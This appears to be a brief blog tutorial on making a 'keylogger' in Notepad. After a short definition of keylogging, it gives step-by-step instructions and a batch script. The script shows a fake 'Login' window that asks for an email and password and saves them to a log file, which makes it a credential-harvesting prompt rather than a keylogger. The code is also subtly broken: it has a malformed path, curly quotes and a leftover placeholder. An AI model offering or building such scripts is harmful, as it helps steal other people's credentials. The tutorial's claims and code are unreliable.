how to create a keylogger in notepad || keylogging tricks

How to create a key logger in notepad 
key logging tricks

What is keylogging?

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored.[1] It has uses in the study of human–computer interaction. There are numerous keylogging methods, ranging from hardware and software-based approaches to acoustic analysis. read more-wiki

What are keyloggers?

Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party. credit-.

Keylogger with the help of notepad

so now we are going to create a keylogger script, just follow the steps

Step 1.

open your notepad

Step 2

now copy below code

@echo off
color a
title Login
echo Please Enter Email Adress And Password
cd “C:keylogs”
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<

Step 3.

now save it as keylogger.bat

Step 4.

now create a new folder and name it keylogs and put this folder in C drive

Note:-If the folder is not named as keylogs, then it will not work

Step 5

now open your keylogger.bat file, so now your keylogger is ready as shown below

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